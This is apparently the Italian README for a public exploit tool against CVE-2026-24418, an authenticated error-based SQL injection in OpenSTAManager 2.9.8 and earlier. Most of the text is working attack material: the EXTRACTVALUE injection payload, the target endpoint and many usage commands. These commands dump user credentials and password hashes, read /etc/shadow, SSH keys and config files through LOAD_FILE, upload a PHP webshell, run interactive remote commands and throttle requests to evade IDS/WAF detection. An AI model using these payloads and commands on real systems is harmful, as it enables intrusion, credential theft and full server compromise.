
OpenSTAManager v2.9.8 e precedenti contengono una vulnerabilità critica di SQL Injection basata su errori nel gestore delle operazioni in blocco per il modulo Scadenzario (Payment Schedule).
OpenSTAManager <= 2.9.8 — SQL Injection basata su errori nel modulo operazioni bulk di Scadenzario
| Campo | Dettagli |
|---|---|
| ID CVE | CVE-2026-24418 |
| Gravità | ALTA (8.8) |
| CWE | CWE-89: SQL Injection |
| Versioni Affette | OpenSTAManager <= 2.9.8 |
| Parametro Vulnerabile | id_records[] (array POST) |
| Endpoint Vulnerabile | /actions.php?id_module=18 |
| Tipo di Attacco | SQL Injection basata su errori (EXTRACTVALUE) |
| Autenticazione | Richiesta (qualsiasi account utente valido) |
OpenSTAManager v2.9.8 e versioni precedenti contengono una vulnerabilità critica di SQL Injection basata su errori nel gestore delle operazioni bulk per il modulo Scadenzario (Piano di Pagamento). L'applicazione non convalida che gli elementi dell'array id_records[] siano interi prima di utilizzarli in una clausola SQL IN(), consentendo a utenti autenticati di iniettare comandi SQL arbitrari ed estrarre dati sensibili tramite messaggi di errore XPATH.
/actions.php riceve id_records[] tramite POSTarray_clean() rimuove solo valori vuoti, NON convalida i tipi di dati/modules/scadenzario/bulk.php passa valori non sanificati direttamente in una clausola SQL IN()| Funzionalità | Descrizione |
|---|---|
--info | Impronta digitale del server database (versione, utente, hostname, SO, percorsi) |
--privs | Enumerazione dei privilegi MySQL (FILE, SUPER, PROCESS) |
--users | Dump completo delle credenziali da zz_users con esportazione automatica degli hash |
--dbs | Enumera tutti i database accessibili |
--tables | Elenca le tabelle con conteggio righe |
--columns | Elenca le colonne con tipi e informazioni su nullable |
--dump | Esfiltrazione dati da qualsiasi tabella/colonna |
--sql | Esecuzione di query SQL personalizzate |
--file-read | Legge file del server tramite LOAD_FILE() (/etc/passwd, file di configurazione, chiavi SSH) |
--file-read-hex | Lettura file codificata in HEX per bypassare filtri |
--webshell | Carica webshell PHP tramite INTO DUMPFILE |
--rce | Esecuzione interattiva di comandi tramite webshell caricata |
-o / --output | Salva tutti i risultati in formato JSON, CSV e hashcat/john |
--proxy | Supporto proxy HTTP (Burp Suite) |
--delay | Limitazione delle richieste per evasione IDS/WAF |
git clone https://github.com/BridgerAlderson/CVE-2026-24418.git
cd CVE-2026-24418
pip install requests
# Login with credentials
python3 exploit.py -t http://target.com -u admin -p password --info
# Use existing session cookie
python3 exploit.py -t http://target.com -c <PHPSESSID_VALUE> --info
# Database info + privileges + user credentials
python3 exploit.py -t http://target.com -u admin -p secret --all
# Check MySQL privileges (FILE, SUPER, etc.)
python3 exploit.py -t http://target.com -u admin -p secret --privs
# Dump users and auto-export hashes
python3 exploit.py -t http://target.com -u admin -p secret --users -o ./loot
# Output files:
# ./loot/users.json - Full user data
# ./loot/users.csv - CSV format
# ./loot/hashes_hashcat.txt - Hashcat format (mode 3200)
# ./loot/hashes_john.txt - John format (user:hash)
# List all databases
python3 exploit.py -t http://target.com -u admin -p secret --dbs
# List tables in a specific database
python3 exploit.py -t http://target.com -u admin -p secret --tables -D openstamanager
# List columns of a table
python3 exploit.py -t http://target.com -u admin -p secret --columns -T zz_users
# Dump specific columns with row limit
python3 exploit.py -t http://target.com -u admin -p secret --dump -T zz_users -C username,password --limit 10
# Read /etc/passwd
python3 exploit.py -t http://target.com -u admin -p secret --file-read /etc/passwd
# Read application config (database credentials)
python3 exploit.py -t http://target.com -u admin -p secret --file-read /var/www/html/openstamanager/config.inc.php
# Read SSH keys
python3 exploit.py -t http://target.com -u admin -p secret --file-read /home/user/.ssh/id_rsa
# HEX mode (bypass character filters)
python3 exploit.py -t http://target.com -u admin -p secret --file-read-hex /etc/shadow
# Upload webshell (auto-detects webroot)
python3 exploit.py -t http://target.com -u admin -p secret --webshell
# Upload webshell with specific webroot
python3 exploit.py -t http://target.com -u admin -p secret --webshell --webroot /var/www/html
# Interactive shell session
python3 exploit.py -t http://target.com -u admin -p secret --rce
# RCE will auto-upload webshell if none exists
# Save everything to a directory
python3 exploit.py -t http://target.com -u admin -p secret --all -o ./loot
# Generated files:
# db_info.json, privileges.json, users.json, users.csv,
# hashes_hashcat.txt, hashes_john.txt
# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --users --proxy http://127.0.0.1:8080
# With request delay (2 seconds between requests)
python3 exploit.py -t http://target.com -u admin -p secret --users --delay 2
# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --info -k
Bersaglio:
-t, --target URL base del bersaglio
Autenticazione:
-u, --user Nome utente per il login
-p, --password Password per il login
-c, --cookie Valore PHPSESSID esistente
Enumerazione:
-D, --database Nome del database bersaglio
-T, --table Nome della tabella bersaglio
-C, --columns-list Colonne da estrarre (separate da virgola)
--limit Limite righe per i dump
Azioni:
--info Informazioni sul server database
--users Dump delle credenziali di zz_users
--dbs Enumera database
--tables Elenca tabelle
--columns Elenca colonne (richiede -T)
--dump Estrai dati (richiede -T e -C)
--sql QUERY Query SQL personalizzata
--all Esegui --info + --privs + --users
--privs Verifica privilegi MySQL
Operazioni sui File:
--file-read PATH Legge file tramite LOAD_FILE()
--file-read-hex PATH Legge file tramite codifica HEX
Esecuzione Remota di Codice:
--webshell Carica webshell PHP
--webroot PATH Percorso webroot per il caricamento della shell
--rce Esecuzione interattiva di comandi
Output:
-o, --output DIR Salva risultati nella directory
Rete:
-m, --module-id ID del modulo (default: 18)
--proxy URL del proxy HTTP
-k, --no-ssl-verify Disabilita verifica SSL
--delay Ritardo richieste in secondi
id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(<SQL_QUERY>)))#
MySQL EXTRACTVALUE() restituisce al massimo ~32 caratteri tramite errori XPATH. Lo strumento suddivide automaticamente i risultati lunghi usando SUBSTRING():
SUBSTRING((<query>), 1, 31) -- Chunk 1
SUBSTRING((<query>), 32, 31) -- Chunk 2
...